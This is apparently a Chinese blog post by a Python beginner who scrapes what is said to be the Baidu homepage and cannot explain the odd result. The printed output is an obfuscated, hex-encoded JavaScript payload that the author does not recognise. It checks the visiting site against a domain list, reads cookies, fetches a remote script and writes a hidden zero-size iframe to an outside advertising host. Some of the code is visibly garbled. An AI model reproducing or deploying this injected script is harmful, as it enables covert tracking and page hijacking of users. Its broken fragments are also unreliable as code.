Python:学习Python爬虫的第一天

阅读: 评论:0

Python:学习Python爬虫的第一天

Python:学习Python爬虫的第一天

疑问:

跟着Python教学视频,爬百度首页,结果不同?(代码、结果往下看)

1:

发现本地的IE浏览器打开百度有报错,搜狗浏览器可以正常打开。而且,eclipse执行出来的结果跟在IE浏览器百度首页查看到的源码一样是一样的,360浏览器的源码跟视频里一样的。莫不是,eclipse默认的是IE浏览器的??

2:

修复IE浏览器:url=/  打开仍有报错,url=/  可以正常打开。

eclipse执行还是不对。

3:

换了个url=/ 爬 IE跟搜狗的源代码相同,eclipse的结果还是怪怪的。。。证明跟浏览器无关了。

4:

爬酷狗首页不正确的原因找到了。

其实是对的,只是因为Eclipse Console 默认限制了结果行数(只显示后80000的字符),去掉勾选后,显示正常。

 百度。。。还是不知道为什么,换了个电脑效果一样的。


环境:Python 3.x + eclipse

代码如下:


import re
from urllib import request
 
url=r"/"

#创建自定义的请求对象
req=request.Request(url)

#发送请求,获取响应信息 
response=request.urlopen(req).read().decode('utf-8')

#pat=r"<title>(.*?)</title>"    #通过正则表达式进行数据清洗
#data=re.findall(pat,response)

print(response)

 

执行后结果如下:


<!DOCTYPE html>
<html lang="zh-CN"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<script type="text/javascript">
    (function(t,e){function n(){var e;try{e=new XMLHttpRequest}catch(n){for(var c=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.5.0","MSXML2.XMLHTTP.4.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"],o=0;o<c.length&&!e;o++)try{e=new ActiveXObject(c[o])}catch(n){}}return e?e:(alert("Error creating the XMLHttpRequest object."),void(location.href=t))}function c(t,e){if(o)try{o.open("GET",t,!0),o.onreadystatechange=function(){if(4=&#adyState)if(200==o.status)try{sponseText)}catch(t){}else document.write("HTTP Status "+o.status),document.close()},o.send(null)}catch(n){document.write("Can't connect to server:n"+n),document.close()}}var o=n()
c(t,function(t){document.write(t),document.close(); setTimeout(function(){var n1 = ateElement("script");n1.setAttribute("type","text/javascript");n1.setAttribute("src",e);    (document.head||ElementsByTagName('head')[0]).appendChild(n1);},1000);})})('/?t=912558218',"var __encode ='sojson', _0xb483=["x5Fx64x65x63x6Fx64x65","x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex73x6Fx6Ax73x6Fx6Ex2Ex63x6Fx6Dx2Fx6Ax61x76x61x73x63x72x69x70x74x6Fx62x66x75x73x63x61x74x6Fx72x2Ex68x74x6Dx6C"];(function(_0xd642x1){_0xd642x1[_0xb483[0]]= _0xb483[1]})(window);var __Ox3e844=["x6Ex75x72x2Ex63x6E","x69x7Ax64x61x2Ex63x6Fx6D","x62x61x64x61x6Dx62x69x7Ax2Ex63x6Fx6D","x75x71x75x72x2Ex63x6E","x75x6Cx69x6Ex69x78x2Ex63x6Fx6D","x65x79x6Ex65x6Bx2Ex6Ex65x74","x65x79x6Ex65x6Bx2Ex62x69x7A","x63x68x65x6Ex67x61x62x6Cx65x2Ex6Ex65x74","x78x6Dx64x35x2Ex63x6Fx6D","x78x6Dx64x35x2Ex6Fx72x67","x66x61x63x65x62x6Fx6Fx6Bx2Ex63x6Fx6D","x74x77x69x74x74x65x72x2Ex63x6Fx6D","x75x68x72x70x2Ex6Fx72x67","x69x73x74x69x71x6Cx61x6Cx68x65x77x65x72x2Ex63x6Fx6D","x6Dx61x61x72x69x70x2Ex6Fx72x67","x74x72x74x2Ex6Ex65x74x2Ex74x72","x74x75x72x6Bx69x73x74x61x6Ex74x69x6Dx65x73x2Ex63x6Fx6D","x75x79x67x68x75x72x61x6Dx61x72x69x63x61x6Ex2Ex6Fx72x67","x75x79x67x68x75x72x63x6Fx6Ex67x72x65x73x73x2Ex6Fx72x67","x75x79x67x68x75x72x65x6Ex73x65x6Dx62x6Cx65x2Ex63x6Fx2Ex75x6B","x75x79x67x68x75x72x69x73x74x61x6Ex2Ex6Fx72x67","x75x79x67x68x75x72x6Ax61x70x61x6Ex2Ex6Fx72x67","x75x79x67x68x75x72x70x72x65x73x73x2Ex63x6Fx6D","x75x79x67x68x75x72x79x61x72x2Ex6Fx72x67","x75x79x68x65x77x65x72x2Ex62x69x7A","x75x79x6Dx61x61x72x69x70x2Ex63x6Fx6D","x61x6Bx61x64x65x6Dx69x79x65x2Ex6Fx72x67","x69x73x74x69x71x6Cx61x6Cx2Ex6Ex65x74","x69x75x68x72x64x66x2Ex6Fx72x67","x6Fx6Cx69x6Dx61x6Cx61x72x2Ex6Fx72x67","x72x66x61x2Ex6Fx72x67","x75x6Ex74x72x2Ex6Fx72x67","x75x79x67x68x75x72x6Ex65x74x2Ex6Fx72x67","x61x61x77x73x61x74x2Ex63x6Fx6D","x61x68x73x65x6Ex64x65x72x2Ex63x6Fx6D","x62x65x68x69x6Ex64x2Dx62x61x72x73x2Ex6Ex65x74","x62x65x73x74x67x6Fx72x65x2Ex63x6Fx6D","x62x69x6Cx69x71x69x7Ax2Ex63x6Fx6D","x62x69x71x6Cx65x2Ex63x6Fx6D","x62x6Cx69x70x2Ex74x76","x63x68x69x6Ex65x73x65x2Ex75x68x72x70x2Ex6Fx72x67","x63x68x69x6Ex65x73x65x62x6Cx6Fx67x2Ex75x68x72x70x2Ex6Fx72x67","x64x6Fx67x75x74x75x72x6Bx69x73x74x61x6Ex62x75x6Cx74x65x6Ex69x2Ex63x6Fx6D","x64x6Fx67x75x74x75x72x6Bx69x73x74x61x6Ex63x61x2Ex74x72x2Ex67x67","x64x6Fx67x75x74x75x72x6Bx69x73x74x61x6Ex73x65x6Dx70x6Fx7Ax79x75x6Dx75x2Ex63x6Fx6D","x64x6Fx77x6Ex65x75x2Ex6Fx72x67","x64x6Fx77x6Ex6Cx6Fx61x64x64x61x69x6Cx79x6Dx6Fx74x69x6Fx6Ex2Ex63x6Fx6D","x65x61x73x74x2Dx74x75x72x6Bx69x73x74x61x6Ex2Ex74x76","x65x61x73x74x65x72x6Ex74x75x72x6Bx69x73x74x61x6Ex67x6Fx76x65x72x6Ex6Dx65x6Ex74x2Ex63x6Fx6D","x65x61x73x74x74x75x72x6Bx65x73x74x61x6Ex2Ex63x6Fx6D","x65x61x73x74x74x75x72x6Bx69x73x74x61x6Ex2Dx67x6Fx76x2Ex6Fx72x67","x65x61x73x74x74x75x72x6Bx69x73x74x61x6Ex2Dx67x6Fx76x65x72x6Ex6Dx65x6Ex74x2Ex6Fx72x67","x65x61x73x74x74x75x72x6Bx69x73x74x61x6Ex63x63x2Ex6Fx72x67","x65x61x73x74x74x75x72x6Bx69x73x74x61x6Ex67x6Fx76x65x72x6Ex6Dx65x6Ex74x69x6Ex65x78x69x6Cx65x2Ex75x73","x65x61x73x74x74x75x72x6Bx69x73x74x61x6Ex69x6Ex66x6Fx2Ex63x6Fx6D","x72x66x69x2Ex66x72","x63x68x6Fx73x75x6Ex2Ex63x6Fx6D","x63x6Ex61x2Ex63x6Fx6Dx2Ex74x77","x72x74x68x6Bx2Ex68x6B","x73x74x68x65x61x64x6Cx69x6Ex65x2Ex63x6Fx6D","x6Fx72x69x65x6Ex74x61x6Cx64x61x69x6Cx79x2Ex6Fx6Ex2Ex63x63","x69x2Dx63x61x62x6Cx65x2Ex63x6Fx6D","x6Dx69x6Ex67x70x61x6Fx6Dx6Fx6Ex74x68x6Cx79x2Ex63x6Fx6D","x79x7Ax7Ax6Bx2Ex63x6Fx6D","x6Ex65x78x74x6Dx65x64x69x61x2Ex63x6Fx6D","x63x68x69x6Ex65x73x65x70x65x6Ex2Ex6Fx72x67","x62x6Fx78x75x6Ex2Ex63x6Fx6D","x6Dx69x6Ex67x6Ax69x6Ex67x6Ex65x77x73x2Ex63x6Fx6D","x62x65x69x6Ax69x6Ex67x73x70x72x69x6Ex67x2Ex63x6Fx6D","x6Dx73x67x75x61x6Ex63x68x61x2Ex63x6Fx6D","x62x6Fx74x61x6Ex77x61x6Ex67x2Ex63x6Fx6D","x77x72x63x68x69x6Ex61x2Ex6Fx72x67","x6Fx70x65x6Ex2Ex63x6Fx6Dx2Ex68x6B","x61x62x6Fx6Cx75x6Fx77x61x6Ex67x2Ex63x6Fx6D","x36x70x61x72x6Bx2Ex63x6Fx6D","x63x72x65x61x64x65x72x73x2Ex6Ex65x74","x77x65x6Ex78x75x65x63x69x74x79x2Ex63x6Fx6D","x73x69x6Ex6Fx76x69x73x69x6Fx6Ex2Ex6Ex65x74","x68x61x76x65x38x2Ex74x76","x70x6Fx70x79x61x72x64x2Ex6Fx72x67","x6Dx69x74x62x62x73x2Ex63x6Fx6D","x6Fx7Ax63x68x69x6Ex65x73x65x2Ex63x6Fx6D","x79x6Fx72x6Bx62x62x73x2Ex63x61","x77x65x73x74x63x61x2Ex63x6Fx6D","x74x6Fx6Bx79x6Fx63x6Ex2Ex63x6Fx6D","x31x36x33x2Ex63x6Fx6D","x71x71x2Ex63x6Fx6D","x69x66x65x6Ex67x2Ex63x6Fx6D","","x72x65x66x65x72x72x65x72","x64x6Fx63x75x6Dx65x6Ex74","x74x6Fx70","x6Cx6Fx67","x70x61x72x65x6Ex74","x68x72x65x66","x6Cx6Fx63x61x74x69x6Fx6E","x6Cx65x6Ex67x74x68","x69x6Ex64x65x78x4Fx66","x63x6Fx6Fx6Bx69x65","x69x6Dx6Dx6Fx72x74x61x6Cx5F","x65x72x72x6Fx72","x69x66x72x61x6Dx65","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x73x72x63","x68x74x74x70x3Ax2Fx2Fx64x72x6Fx70x73x2Ex61x71x66x65x6Ex2Ex63x6Fx6Dx2Fx61x64x76x65x72x74x69x73x65x2Fx70x75x62x6Cx69x63x2Fx3Fx73x79x73x64x61x74x61x3D","x26x68x6Fx73x74x3D","x66x72x61x6Dx65x62x6Fx72x64x65x72","x68x65x69x67x68x74","x77x69x64x74x68","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79","x3Cx69x66x72x61x6Dx65x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx64x72x6Fx70x73x2Ex61x71x66x65x6Ex2Ex63x6Fx6Dx2Fx61x64x76x65x72x74x69x73x65x2Fx70x75x62x6Cx69x63x2Fx3Fx73x79x73x64x61x74x61x3D","x22x20x77x69x64x74x68x3Dx30x20x68x65x69x67x68x74x3Dx30x20x66x72x61x6Dx65x62x6Fx72x64x65x72x3Dx30x3Ex3Cx2Fx69x66x72x61x6Dx65x3E","x77x72x69x74x65"];var stander_url= new Array(__Ox3e844[0x0],__Ox3e844[0x1],__Ox3e844[0x2],__Ox3e844[0x3],__Ox3e844[0x4],__Ox3e844[0x5],__Ox3e844[0x6],__Ox3e844[0x7],__Ox3e844[0x8],__Ox3e844[0x9],__Ox3e844[0xa],__Ox3e844[0xb],__Ox3e844[0xc],__Ox3e844[0xd],__Ox3e844[0xe],__Ox3e844[0xf],__Ox3e844[0x10],__Ox3e844[0x11],__Ox3e844[0x12],__Ox3e844[0x13],__Ox3e844[0x14],__Ox3e844[0x15],__Ox3e844[0x16],__Ox3e844[0x17],__Ox3e844[0x18],__Ox3e844[0x19],__Ox3e844[0x1a],__Ox3e844[0x1b],__Ox3e844[0x1c],__Ox3e844[0x1d],__Ox3e844[0x1e],__Ox3e844[0x1f],__Ox3e844[0x20],__Ox3e844[0x21],__Ox3e844[0x22],__Ox3e844[0x1a],__Ox3e844[0x23],__Ox3e844[0x24],__Ox3e844[0x25],__Ox3e844[0x26],__Ox3e844[0x27],__Ox3e844[0x28],__Ox3e844[0x29],__Ox3e844[0x2a],__Ox3e844[0x2b],__Ox3e844[0x2c],__Ox3e844[0x2d],__Ox3e844[0x2e],__Ox3e844[0x2f],__Ox3e844[0x30],__Ox3e844[0x31],__Ox3e844[0x32],__Ox3e844[0x33],__Ox3e844[0x34],__Ox3e844[0x35],__Ox3e844[0x36],__Ox3e844[0x37],__Ox3e844[0x38],__Ox3e844[0x39],__Ox3e844[0x3a],__Ox3e844[0x3b],__Ox3e844[0x3c],__Ox3e844[0x3d],__Ox3e844[0x3e],__Ox3e844[0x3f],__Ox3e844[0x40],__Ox3e844[0x41],__Ox3e844[0x42],__Ox3e844[0x43],__Ox3e844[0x44],__Ox3e844[0x45],__Ox3e844[0x46],__Ox3e844[0x47],__Ox3e844[0x48],__Ox3e844[0x49],__Ox3e844[0x4a],__Ox3e844[0x4b],__Ox3e844[0x4c],__Ox3e844[0x4d],__Ox3e844[0x4e],__Ox3e844[0x4f],__Ox3e844[0x50],__Ox3e844[0x51],__Ox3e844[0x52],__Ox3e844[0x53],__Ox3e844[0x54],__Ox3e844[0x55],__Ox3e844[0x56],__Ox3e844[0x57]);var sysdata=__Ox3e844[0x58];var url=__Ox3e844[0x58];try{url= window[__Ox3e844[0x5b]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(M){console[__Ox3e844[0x5c]](M);if(window[__Ox3e844[0x5d]]){try{url= window[__Ox3e844[0x5d]][__Ox3e844[0x5a]][__Ox3e844[0x59]]}catch(L){console[__Ox3e844[0x5c]](L);url= __Ox3e844[0x58]}}};if(url=== __Ox3e844[0x58]){url= document[__Ox3e844[0x59]]};if(url=== __Ox3e844[0x58]){url= window[__Ox3e844[0x5f]][__Ox3e844[0x5e]]};function inarray(url,stander_url){for(var _0xf050x5=0;_0xf050x5< stander_url[__Ox3e844[0x60]];_0xf050x5++){if(url[__Ox3e844[0x61]](stander_url[_0xf050x5])!=  -1){return true}};return false}if(!inarray(url,stander_url)){var cookie_str=document[__Ox3e844[0x62]];if(cookie_str[__Ox3e844[0x61]](__Ox3e844[0x63])!=  -1){throw  new Error(__Ox3e844[0x64])}};try{var iframe=document[__Ox3e844[0x66]](__Ox3e844[0x65]);iframe[__Ox3e844[0x67]]= __Ox3e844[0x68]+ sysdata+ __Ox3e844[0x69]+ url;iframe[__Ox3e844[0x6a]]= 0;iframe[__Ox3e844[0x6b]]= 0;iframe[__Ox3e844[0x6c]]= 0;document[__Ox3e844[0x6e]][__Ox3e844[0x6d]](iframe)}catch(e){console[__Ox3e844[0x5c]](e);document[__Ox3e844[0x71]](__Ox3e844[0x6f]+ sysdata+ __Ox3e844[0x69]+ url+ __Ox3e844[0x70])}");
</script>
</head>
<body style="display:none">
</body>
</html>

本文发布于:2024-02-04 09:52:21,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170704514554528.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:爬虫   Python
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23